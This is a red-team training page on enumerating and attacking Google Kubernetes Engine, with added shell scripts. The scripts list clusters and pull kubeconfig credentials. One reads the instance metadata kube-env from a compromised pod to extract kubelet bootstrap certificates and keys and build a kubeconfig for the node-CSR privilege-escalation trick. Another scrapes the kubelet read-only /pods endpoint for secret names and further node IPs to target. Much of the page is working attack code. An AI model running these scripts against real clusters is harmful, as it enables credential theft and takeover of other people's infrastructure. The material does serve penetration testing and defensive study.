GCP - Containers & GKE Enum
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Under GCP containers you will find most of the container-based services GCP offers; this page shows how to enumerate the most common ones:
On the following page you can see how to abuse container permissions to escalate privileges:
These are the groups of machines (nodes) that make up Kubernetes clusters.
For an explanation of what Kubernetes is, check this page:
First, check whether there are any Kubernetes clusters in your project.
If you have a cluster, you can have gcloud automatically populate your ~/.kube/config file. This file is what authenticates you when you use kubectl, the native CLI for interacting with K8s clusters. Try this command.
Then take a look at the ~/.kube/config file to see the generated credentials. The file is used to automatically refresh access tokens based on the same identity that your gcloud session is using. This of course requires the correct permissions to be in place.
Once that is set up, you can try the following command to get the cluster configuration.
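The listing, credential generation and cluster-info steps above as one script, an added example that is not code from the original page. It assumes gcloud (with the gke-gcloud-auth-plugin) and kubectl are installed and that the active identity holds container.clusters.list and container.clusters.getCredentials; the gke_location_flag and gke_credentials_cmd helper names are this example's own.

```shell
#!/bin/sh
# Added example: enumerate GKE clusters in the current project and generate
# kubeconfig entries for each one. Not part of the original page.
# Assumes gcloud + gke-gcloud-auth-plugin + kubectl are installed and the
# active gcloud identity can list clusters and fetch their credentials.

# GKE clusters are either zonal (location like us-central1-a) or regional
# (location like us-central1); get-credentials needs the matching flag.
gke_location_flag() {
  case "$1" in
    *-*-*) echo "--zone" ;;     # three hyphen-separated parts: a zone
    *-*)   echo "--region" ;;   # two parts: a region
    *)     return 1 ;;          # not a GKE location string
  esac
}

# Build the get-credentials invocation for one "name location" pair.
gke_credentials_cmd() {
  name=$1; location=$2
  flag=$(gke_location_flag "$location") || return 1
  echo "gcloud container clusters get-credentials $name $flag $location"
}

# Step 1: list clusters with the fields that matter for triage.
list_clusters() {
  gcloud container clusters list \
    --format='value(name,location,endpoint,currentMasterVersion,status)'
}

# Step 2/3: for each cluster, pull credentials into ~/.kube/config, show the
# exec entry gcloud wrote (the auth plugin that mints tokens from the gcloud
# identity) and query the control plane.
enumerate_gke() {
  gcloud container clusters list --format='value(name,location)' |
  while read -r name location; do
    [ -n "$name" ] || continue
    cmd=$(gke_credentials_cmd "$name" "$location") || continue
    echo "# $cmd"
    if ! eval "$cmd" >/dev/null 2>&1; then
      echo "  getCredentials denied on $name"; continue
    fi
    kubectl config view --minify --raw | grep -A3 'exec:' | head -4
    kubectl cluster-info 2>&1 | head -3
  done
}

# Live run only when explicitly asked: sh gke-enum.sh run
if [ "${1:-}" = "run" ]; then
  list_clusters
  enumerate_gke
fi
```

If get-credentials is denied but list succeeded, the identity has container.clusters.list only; the endpoint column still tells you where the API server is.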
You can read more about gcloud for containers here.
This is a simple script to enumerate kubernetes in GCP: https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_k8s_enum
Initially this privilege escalation technique allowed privilege escalation inside the GKE cluster, effectively letting an attacker fully compromise it.
This is because GKE provides TLS Bootstrap credentials in the instance metadata, which are accessible to anyone who has compromised a pod.
The technique used is explained in the following posts:
And this tool was created to automate the process: https://github.com/4ARMED/kubeletmein
However, the technique abused the fact that with the metadata credentials it was possible to generate a CSR (Certificate Signing Request) for a new node, which was automatically approved. In my test I checked that those requests aren't automatically approved anymore, so I'm not sure if this technique is still valid.
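A check for the precondition of that technique, as an added example (not code from the page or from kubeletmein): from inside a pod, ask the metadata server for kube-env, see whether it still carries bootstrap material, and if so write it into a kubeconfig. The key names CA_CERT, KUBELET_CERT, KUBELET_KEY and KUBERNETES_MASTER_NAME, and the assumption that their values are already base64-encoded PEM, are what this example assumes about kube-env.

```shell
#!/bin/sh
# Added example: probe GKE instance metadata for node bootstrap credentials.
# Not from the original page or kubeletmein. Assumes kube-env is "KEY: value"
# lines whose cert/key values are base64 PEM (assumption, not verified here).

METADATA_URL='http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env'

# Fetch kube-env; the Metadata-Flavor header is mandatory. Fails silently when
# metadata is blocked (metadata concealment / Workload Identity / NetworkPolicy).
fetch_kube_env() {
  curl -sf -H 'Metadata-Flavor: Google' "$METADATA_URL"
}

# Pull one "KEY: value" entry from kube-env text on stdin.
kube_env_get() {
  sed -n "s/^$1: *//p" | head -n 1
}

# Report which bootstrap pieces are present (kube-env on stdin). Returns 0 only
# if CA cert, kubelet cert/key and master address are all there, which is the
# precondition for the node-CSR trick.
kube_env_has_bootstrap() {
  env_text=$(cat)
  missing=0
  for k in CA_CERT KUBELET_CERT KUBELET_KEY KUBERNETES_MASTER_NAME; do
    if [ -n "$(printf '%s\n' "$env_text" | kube_env_get "$k")" ]; then
      echo "present: $k"
    else
      echo "missing: $k"; missing=1
    fi
  done
  return $missing
}

# Write a bootstrap kubeconfig from kube-env (stdin) to the path in $1.
# Values are assumed base64 already, so they go straight into *-data fields.
write_bootstrap_kubeconfig() {
  out=$1; env_text=$(cat)
  ca=$(printf '%s\n' "$env_text" | kube_env_get CA_CERT)
  crt=$(printf '%s\n' "$env_text" | kube_env_get KUBELET_CERT)
  key=$(printf '%s\n' "$env_text" | kube_env_get KUBELET_KEY)
  master=$(printf '%s\n' "$env_text" | kube_env_get KUBERNETES_MASTER_NAME)
  [ -n "$ca" ] && [ -n "$crt" ] && [ -n "$key" ] && [ -n "$master" ] || return 1
  cat > "$out" <<EOF
apiVersion: v1
kind: Config
clusters:
- name: gke
  cluster:
    server: https://$master
    certificate-authority-data: $ca
users:
- name: kubelet-bootstrap
  user:
    client-certificate-data: $crt
    client-key-data: $key
contexts:
- name: bootstrap
  context: {cluster: gke, user: kubelet-bootstrap}
current-context: bootstrap
EOF
}

# Constructed sample standing in for a real kube-env response (values are
# base64 of placeholder strings, not real certificates).
SAMPLE_KUBE_ENV='CA_CERT: Q0EtQ0VSVA==
KUBELET_CERT: S1VCRUxFVC1DRVJU
KUBELET_KEY: S1VCRUxFVC1LRVk=
KUBERNETES_MASTER_NAME: 10.0.0.2
CLUSTER_NAME: demo'

# Live run only when explicitly asked: sh kube-env-probe.sh run
if [ "${1:-}" = "run" ]; then
  env_text=$(fetch_kube_env) || { echo "kube-env not reachable: metadata is protected"; exit 1; }
  printf '%s\n' "$env_text" | kube_env_has_bootstrap || exit 1
  printf '%s\n' "$env_text" | write_bootstrap_kubeconfig ./bootstrap.kubeconfig
  # The next step of the original technique is a node CSR with this identity;
  # whether it can even be created tells you how far the trick still goes.
  kubectl --kubeconfig ./bootstrap.kubeconfig auth can-i create certificatesigningrequests.certificates.k8s.io
fi
```

A "missing" line for every key means the pod cannot see kube-env at all, which is what metadata concealment or Workload Identity produces; a full set of "present" lines only proves the credentials are exposed, not that a CSR made with them will be approved.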
In this post it was found that there was a Kubelet API address reachable from inside a pod in GKE that returned details of the running pods:
Even if the API does not allow modifying resources, it may still be possible to obtain sensitive information from the response. The /pods endpoint was found using Kiterunner.
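The triage described above as an added example that is not code from the page or from the referenced post: query /pods on a node's read-only kubelet port and pull out what is useful even when nothing can be modified. It assumes the node address is supplied in NODE_IP, that the read-only port is 10255 and still enabled on that node, and uses only grep/sed so it works in a minimal container; the sample PodList is constructed.

```shell
#!/bin/sh
# Added example: enumerate what the kubelet's read-only /pods endpoint leaks.
# Not from the original page. Assumes port 10255 (kubelet read-only port) and
# that the node address is known (NODE_IP); JSON is parsed with grep/sed only.

# Query /pods on the read-only port; empty output means closed or filtered.
kubelet_pods() {
  curl -sf --max-time 5 "http://$1:10255/pods"
}

# Each pod's metadata carries exactly one "namespace" key (heuristic count).
count_pods() { grep -o '"namespace" *: *"' | wc -l | tr -d ' '; }

# Strip a `"key": "value"` match down to value.
value_only() { sed -E 's/.*: *"//; s/"$//'; }

# Container images (spec and containerStatuses both list them; dedupe).
list_images() { grep -oE '"image" *: *"[^"]*"' | value_only | sort -u; }

# Secrets mounted as volumes.
list_secret_names() { grep -oE '"secretName" *: *"[^"]*"' | value_only | sort -u; }

# Secrets injected through env secretKeyRef.
list_env_secret_refs() {
  grep -oE '"secretKeyRef" *: *[{][^}]*[}]' |
    sed -E 's/.*"name" *: *"([^"]*)".*/\1/' | sort -u
}

# Node IPs from status.hostIP: other nodes whose kubelet you could try next.
list_host_ips() { grep -oE '"hostIP" *: *"[^"]*"' | value_only | sort -u; }

# Constructed sample PodList in the compact form the kubelet returns.
SAMPLE_PODS='{"kind":"PodList","apiVersion":"v1","items":[{"metadata":{"name":"web-7d9f","namespace":"prod","uid":"1"},"spec":{"containers":[{"name":"web","image":"gcr.io/demo/web:1.4","env":[{"name":"DB_PASS","valueFrom":{"secretKeyRef":{"name":"db-creds","key":"password"}}}]}],"volumes":[{"name":"tls","secret":{"secretName":"web-tls"}}]},"status":{"hostIP":"10.128.0.5","podIP":"10.4.1.7","containerStatuses":[{"name":"web","image":"gcr.io/demo/web:1.4","imageID":"sha256:abc"}]}},{"metadata":{"name":"cron-x","namespace":"batch","uid":"2"},"spec":{"containers":[{"name":"job","image":"gcr.io/demo/job:2"}]},"status":{"hostIP":"10.128.0.5"}}]}'

# Live run: NODE_IP=10.128.0.5 sh kubelet-ro.sh
if [ -n "${NODE_IP:-}" ]; then
  pods=$(kubelet_pods "$NODE_IP") || { echo "read-only kubelet port not reachable on $NODE_IP"; exit 1; }
  echo "pods: $(printf '%s' "$pods" | count_pods)"
  echo "# images";          printf '%s' "$pods" | list_images
  echo "# secret volumes";  printf '%s' "$pods" | list_secret_names
  echo "# env secret refs"; printf '%s' "$pods" | list_env_secret_refs
  echo "# node IPs seen";   printf '%s' "$pods" | list_host_ips
fi
```

The secret names are the payoff: the read-only port never returns secret contents, but knowing which Secret is mounted where tells you what to target once you have any identity that can read Secrets in that namespace.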